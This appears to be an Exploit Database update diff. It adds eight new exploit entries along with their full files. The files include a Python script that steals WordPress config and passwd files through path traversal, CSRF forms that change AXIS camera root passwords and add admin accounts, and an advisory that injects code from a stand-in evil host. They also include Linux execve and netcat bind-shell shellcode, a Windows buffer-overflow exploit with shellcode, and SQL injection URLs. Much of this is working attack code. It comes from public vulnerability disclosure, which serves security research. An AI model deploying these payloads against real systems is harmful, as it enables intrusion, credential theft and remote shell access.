DB: 2017-03-18

8 new exploits

Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow

FTPShell Client 6.53 - Local Buffer Overflow
Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)
Linux/x86 - Bind Shell Shellcode (51 bytes)
Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download
AXIS Communications - Cross-Site Scripting / Content Injection
AXIS Multiple Products - Cross-Site Request Forgery
Departmental Store Management System 1.2 - SQL Injection

files.csv

@@ -5397,7 +5397,9 @@ id,file,description,date,author,platform,type,port
 41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
 41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
 41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
+41620,platforms/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",windows,dos,0
 41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
+41629,platforms/windows/dos/41629.py,"FTPShell Client 6.53 - Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15956,6 +15958,8 @@ id,file,description,date,author,platform,type,port
 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
+41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
+41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (51 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37534,3 +37538,7 @@ id,file,description,date,author,platform,type,port
 41616,platforms/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps,0
 41617,platforms/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps,0
 41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0
+41622,platforms/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",php,webapps,0
+41625,platforms/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,hardware,webapps,0
+41626,platforms/hardware/webapps/41626.txt,"AXIS Multiple Products - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps,0
+41627,platforms/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",php,webapps,0

platforms/hardware/webapps/41625.txt

@@ -0,0 +1,229 @@
+          0RWELLL4BS
+          **********
+       security advisory
+         olsa-2015-8258
+         PGP: 79A6CCC0
+          @orwelllabs
+
+
+
+
+Advisory Information
+====================
+- Title: ImagePath Resource Injection/Open script editor
+- Vendor: AXIS Communications
+- Research and Advisory: Orwelllabs
+- Class: Improper Input Validation [CWE-20]
+- CVE Name: CVE-2015-8258
+- Affected Versions: Firmwares versions <lt 5.80.x
+- IoT Attack Surface: Device Administrative Interface/Authentication/Autho
+rization
+- OWASP IoTTop10: I1, I2
+
+
+
+Technical Details
+=================
+The variable "imagePath=" (that is prone to XSS in a large range of
+products) also can be used to resource injection intents. If inserted a URL
+in this variable will be made an GET request to this URL, so this an
+interesting point to request malicious codes from the attacker machine, and
+of course, the possibilities are vast (including hook the browser).
+
+
+An attacker sends the following URL for the current Web user interface of
+the camera:
+http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
+st.com/evilcode.html
+
+This request will be processed normally and will return the status code 200
+(OK):
+
+[REQUEST]
+
+GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
+Host: {axisvulnhost}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
+Firefox/41.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
+nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
+uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
+response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
+nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
+Connection: keep-alive
+
+
+GET /evilcode.html HTTP/1.1
+Host: www.3vilh0st.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
+Firefox/41.0
+Accept: image/png,image/*;q=0.8,*/*;q=0.5
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
+st.com/evilcode.html
+Connection: keep-alive
+
+The server response can be seen below (with the clipping of the affected
+HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):
+
+
+<table border="0" cellpadding="3" cellspacing="3">
+ <tr>
+  <td id="videoStreamTable">
+   <script language="JavaScript">
+    <!--
+     video('http://www.3vilh0st.com/evilcode.html');
+    // -->
+   </script>
+  </td>
+ </tr>
+</table>
+
+[..SNIP..]
+
+function listVideoSources()
+{
+var formInt = document.listFormInt;
+var formExt = document.listFormExt;
+var formCrop = document.listFormCrop;
+var presetForm = document.listFormPreset;
+var form = document.WizardForm
+var currentPath = 'http://www.3vilh0st.com/evilcode.html';
+var imageSource;
+
+[..SNIP..]
+
+var reload = false;
+reload |= (other != null && other.search("seq=yes") >= 0);
+reload |= (other != null && other.search("streamprofile=") >= 0);
+reload |= ((other == null || (other != null && other.search("streamprofile=
+;)(r") == -1)) && ('' != ""));
+reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
+
+[..SNIP..]
+
+<script SRC="/incl/activeX.js?id=69"></script>
+</head>
+<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
+marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
+'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
+<script language="JavaScript">
+
+[..SNIP..]
+
+// Draw the scale buttons
+var currentResolution = 0
+var width = 0
+var height = 0
+var imagepath = "http://www.3vilh0st.com/evilcode.html"
+var resStart = imagepath.indexOf("resolution=")
+if (resStart != -1) {
+var resStop = imagepath.indexOf("&", resStart)
+
+[..SNIP..]
+
+
+=================== view.shtml snips =====================
+
+ 447 function zoom(size)
+ 448 {
+ 449   var url = document.URL;
+ 450
+ 451   if (url.indexOf("?") == -1) {
+ 452     url += "F?size=" + size
+ 453   } else if (url.indexOf("size=") == -1) {
+ 454     url += "&size=" + size
+ 455   } else {
+ 456     var searchStr = "size=<!--#echo var="size"
+option="encoding:javascript" -->"
+ 457     var replaceStr = "size=" + size
+ 458     var re = new RegExp(searchStr , "g")
+ 459     url = url.replace(re, replaceStr)
+ 460   }
+ 461
+ 462   document.location = url;
+ 463 }
+ 464
+ 465 var aNewImagePath;
+ 466
+ 467 function reloadPage()
+ 468 {
+ 469   document.location = aNewImagePath;
+ 470 }
+ 471
+
+[ SNIP ]
+
+ 567     aNewImagePath = '/view/view.shtml?id=<!--#echo
+var="ssi_request_id" option="encoding:url" -->&imagePath=' +
+escape(imagePath) + size;
+ 568     if (other != null)
+ 569       aNewImagePath += other;
+ 570 <!--#if expr="$ptzpresets = yes" -->
+ 571     /* append preset parameters so that preset postion is selected in
+drop down list after reload */
+ 572     if (presetName != '')
+ 573       aNewImagePath += "&gotopresetname=" + escape(presetName);
+ 574     else if (gotopresetname != '')
+ 575       aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
+ 576
+ 577     if( newCamera != '')
+ 578       aNewImagePath += "&camera=" + escape(newCamera);
+
+
+
+---*---
+Some legitimate resources can be very interesting to cybercriminals with
+your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case
+there are some resources, like the "Open Script Editor". By this resource
+the user can edit any file in the operation system with root privileges,
+because everything (in the most part of IoT devices) runs with root
+privileges, this is other dangerous point to keep in mind.
+
+> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
+
+Well, one can say that this feature is restricted to the administrator of
+the camera, and this would be true if customers were forced  to change the
+default password during setup phase with a strong password policy, since
+change "pass" to "pass123" does not solve the problem. The aggravating
+factor is that there are thousands of products available on the internet,
+running with default credentials.
+
+
+Vendor Information, Solutions and Workarounds
++++++++++++++++++++++++++++++++++++++++++++++
+According to the manufacturer, the resource injection vulnerability was
+fixed in firmware 5.60, but we identified that the problem still occurred
+in 5.80.x versions of various product models. Check for updates on the
+manufacturer's website.
+
+About Open Script Editor,It was considered that in order to have access to
+this feature, it is necessary to be authenticated as an admin, but if there
+is no policy that forces the client to change the password during the
+product setup (ease vs. security) and also requires a password complexity,
+having an administrative credential to abuse the functionality is not
+exactly an impediment (e.g: botnets that bring embedded in the code a
+relation of default credentials for that type of device)
+
+
+Credits
+=======
+These vulnerabilities has been discovered and published by Orwelllabs.
+
+
+Legal Notices
+=============
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise. We accept no
+responsibility for any damage caused by the use or misuse of this
+information.
+
+
+About Orwelllabs
+================
+https://www.exploit-db.com/author/?a=8225
+https://packetstormsecurity.com/files/author/12322/

platforms/hardware/webapps/41626.txt

@@ -0,0 +1,103 @@
+          0RWELLL4BS
+          **********
+       security advisory
+         olsa-CVE-2015-8255
+         PGP: 79A6CCC0
+          @orwelllabs
+
+
+
+
+Advisory Information
+====================
+- Title: Cross-Site Request Forgery
+- Vendor: AXIS Communications
+- Research and Advisory: Orwelllabs
+- Class: Session Management control [CWE-352]
+- CVE Name: CVE-2015-8255
+- Affected Versions:
+- IoT Attack Surface: Device Web Interface
+- OWASP IoTTop10: I1
+
+
+
+Technical Details
+=================
+Because of the own (bad) design of this kind of device (Actualy a big
+problem of IoT, one of them)
+The embedded web application does not verify whether a valid request was
+intentionally provided by the user who submitted the request.
+
+
+
+PoCs
+====
+#-> Setting root password to W!nst0n
+
+<html>
+  <!-- CSRF PoC  Orwelllabs -->
+  <body>
+    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
+      <input type="hidden" name="action" value="update" />
+      <input type="hidden" name="user" value="root" />
+      <input type="hidden" name="pwd" value="w!nst0n" />
+      <input type="hidden" name="comment" value="Administrator" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+#-> Adding new credential SmithW:W!nst0n
+
+<html>
+  <!-- CSRF PoC - Orwelllabs -->
+  <body>
+    <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
+      <input type="hidden" name="action" value="add" />
+      <input type="hidden" name="user" value="SmithW" />
+      <input type="hidden" name="sgrp"
+value="viewer&#58;operator&#58;admin&#58;ptz" />
+      <input type="hidden" name="pwd" value="W!nst0n" />
+      <input type="hidden" name="grp" value="users" />
+      <input type="hidden" name="comment" value="WebUser" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+#-> Deleting an app via directly CSRF (axis_update.shtml)
+
+http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
+http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
+"></script>
+
+
+[And many acitions allowed to an user [all of them?] can be forged in this
+way]
+
+
+Vendor Information, Solutions and Workarounds
++++++++++++++++++++++++++++++++++++++++++++++
+Well, this is a very old design problem of this kind of device, nothing new
+to say about that.
+
+
+Credits
+=======
+These vulnerabilities has been discovered and published by Orwelllabs.
+
+
+Legal Notices
+=============
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise. We accept no
+responsibility for any damage caused by the use or misuse of this
+information.
+
+
+About Orwelllabs
+================
+https://www.exploit-db.com/author/?a=8225
+https://packetstormsecurity.com/files/author/12322/

platforms/lin_x86/shellcode/41630.asm

@@ -0,0 +1,84 @@
+;================================================================================
+; The MIT License
+;
+; Copyright (c) <year> <copyright holders>
+;
+; Permission is hereby granted, free of charge, to any person obtaining a copy
+; of this software and associated documentation files (the "Software"), to deal
+; in the Software without restriction, including without limitation the rights
+; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+; copies of the Software, and to permit persons to whom the Software is
+; furnished to do so, subject to the following conditions:
+;
+; The above copyright notice and this permission notice shall be included in
+; all copies or substantial portions of the Software.
+;
+; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+; THE SOFTWARE.
+;================================================================================
+; Name : Encrypt Linux x86 Shellcode(44 Bytes) To exceve("/bin/sh")
+; Author : WangYihang
+; Email : wangyihanger@gmail.com
+; Tested on: Linux_x86
+; Shellcode Length: 44
+;================================================================================
+; Shellcode :
+; char shellcode[] = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a"
+; "\x06\x34\xe9\x88\x06\x46\xe2\xf7"
+; "\xeb\x05\xe8\xeb\xff\xff\xff\xd8"
+; "\x20\xb8\x81\xc6\xc6\x9a\x81\x81"
+; "\xc6\x8b\x80\x87\x60\x0a\x83\xe2"
+; "\xb1\x70\x24\x69";
+;================================================================================
+; Python :
+; shellcode = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a\x06\x34\xe9\x88\x06\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xd8\x20\xb8\x81\xc6\xc6\x9a\x81\x81\xc6\x8b\x80\x87\x60\x0a\x83\xe2\xb1\x70\x24\x69"
+;================================================================================
+; Assembly language code :
+
+global _start
+; this shell code will xor every byte of 'jocker' segment , then execute them
+; password is 0xe9 (233)
+_start:
+jmp jocker
+loader:
+pop esi ; get address of encrypted shellcode
+xor ecx, ecx
+mov cl, 21 ; loop times (length of encrypt shellcode)
+decrypt:
+mov al, [esi]
+xor al, 0e9H
+mov [esi], al
+inc esi
+loop decrypt
+jmp encrypt
+
+jocker:
+call loader
+encrypt:
+db 0d8H
+db 20H
+db 0b8H
+db 81H
+db 0c6H
+db 0c6H
+db 9aH
+db 81H
+db 81H
+db 0c6H
+db 8bH
+db 80H
+db 87H
+db 60H
+db 0aH
+db 83H
+db 0e2H
+db 0b1H
+db 70H
+db 24H
+db 69H
+;================================================================================

platforms/lin_x86/shellcode/41631.c

@@ -0,0 +1,49 @@
+/*
+# Super_Small_Bind_Shell (x86)
+# Date: 17.03.2017
+# This shellcode will listen on port 37 and show you how deep the rabbit hole goes
+# Please note that 37 port is below 1024 and thus privileged!
+# Shellcode Author: ALEH BOITSAU
+# Shellcode Length: 51 bytes ;)
+# Tested on: Debian GNU/Linux 8/x86_64
+# Command: gcc -m32 -z execstack super_small_bind_shell.c -o super_small_bind_shell
+
+global _start
+section .text
+ _start:
+    xor eax, eax
+    push eax
+    push 0x3733702d     ;-p37
+    mov esi, esp
+
+    push eax
+    push 0x68732f2f     ;-le//bin//sh
+    push 0x6e69622f
+    push 0x2f656c2d
+    mov edi, esp
+
+    push eax
+    push 0x636e2f2f     ;/bin//nc
+    push 0x6e69622f
+    mov ebx, esp
+
+    push eax
+    push esi
+    push edi
+    push ebx
+    mov ecx, esp
+    mov al,11
+    int 0x80
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] =
+"\x31\xc0\x50\x68\x2d\x70\x33\x37\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
+main()
+{
+	printf("Shellcode Length: %d\n",strlen(shellcode));
+	int (*ret)() = (int(*)())shellcode;
+	ret();
+}

platforms/php/webapps/41622.py

@@ -0,0 +1,60 @@
+import requests
+import string
+import random
+from urlparse import urlparse
+
+print "---------------------------------------------------------------------"
+print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187"
+print "---------------------------------------------------------------------"
+victim = raw_input("Please Enter victim host e.g. http://example.com: ")
+file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n")
+if file_choice == "1":
+    payload="..././..././..././wp-config.php"
+elif file_choice == "2":
+    payload="..././..././..././..././..././..././..././..././etc/passwd"
+else:
+    print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"
+    quit()  
+slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload
+target=victim+slug
+def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
+    return ''.join(random.choice(chars) for _ in range(size))
+	
+def checkPlugin():
+    pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
+    pluginExistence = pluginExists.status_code
+    if pluginExistence == 200:
+        print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
+        exploit()
+    else:
+        print "Target has a funny code & might not be vulnerable, I will now exit\n"
+        quit()
+     
+def exploit():
+    
+    getThatFile = requests.get(target)
+    fileState = getThatFile.status_code
+    breakApart=urlparse(victim)
+    extract_hostname=breakApart.netloc	
+    randomDifferentiator=randomizeFile()
+    cleanName=str(randomDifferentiator)
+    if fileState == 200:
+	respFromThatFile = getThatFile.text
+	if file_choice == "1":
+		resultFile=extract_hostname+"_config_"+cleanName+".txt"
+		print resultFile
+		pwned=open(resultFile, 'w')
+		pwned.write(respFromThatFile)
+		pwned.close
+		print "Wordpress Config Written to "+resultFile
+	else:
+		resultFile=extract_hostname+"_passwd"+cleanName+".txt"
+		pwned=open(resultFile, 'w')
+		pwned.write(respFromThatFile)
+		pwned.close
+		print "Passwd File Written to "+resultFile
+    else: 
+	print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState
+  
+if __name__ == "__main__":
+    checkPlugin()

platforms/php/webapps/41627.txt

@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 17.03.2017
+# Vendor Homepage: http://webstarslab.com
+# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
+# Demo: http://webstarslab.com/departmental-store-management-system/store/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
+# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
+# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
+# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
+# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
+# tbl_users:id
+# tbl_users:username
+# tbl_users:password
+# tbl_users:email
+# tbl_users:full_name
+# tbl_users:permission
+# Etc..
+# # # # #

platforms/windows/dos/41620.txt

@@ -0,0 +1,50 @@
+[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
+[+] Credits / Discovery: Nassim Asrir
+[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
+[+] Author Company: Henceforth
+[+] CVE: CVE-2017-6880
+
+Vendor:
+===============
+
+https://www.cerberusftp.com/
+  
+ 
+Download:
+===========
+
+https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
+ 
+ 
+Vulnerability Type:
+===================
+
+Remote Buffer Overflow.
+
+
+issue:
+===================
+
+This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
+ 
+POC:
+===================
+#Simple POC by Nassim Asrir from Henceforth.
+import socket
+bad_char = "A"*2047
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.1.81',21))
+s.recv(1024)
+s.send('USER nassim\r\n')
+s.recv(1024)
+s.send('PASS mypass\r\n')
+s.recv(1024)
+s.send('MLST ' + bad_char + '\r\n')
+s.close()
+
+https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
+ 
+Tested on:
+=============== 
+
+Windows 7 Sp1 (64 Bit)

platforms/windows/dos/41629.py

@@ -0,0 +1,49 @@
+print '''
+
+                ##############################################
+                #    Created: ScrR1pTK1dd13                  #
+                #    Name: Greg Priest                       #
+                #    Mail: ScrR1pTK1dd13.slammer@gmail.com   # 
+                ##############################################
+
+# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
+# Date: 2017.03.17
+# Exploit Author: Greg Priest
+# Version: FTPShell Client 6.53
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+
+a = "A" * 460
+b = '\xDC\xE8\x65\x76'
+nop = '\x90' * 10
+c = "C" * 1638
+
+#calc.exe
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+evilstring = a+b+nop+shellcode+c
+
+
+file = open ('evilstring.txt', "w")
+file.write(evilstring)
+file.close
+
+print evilstring
+
+
+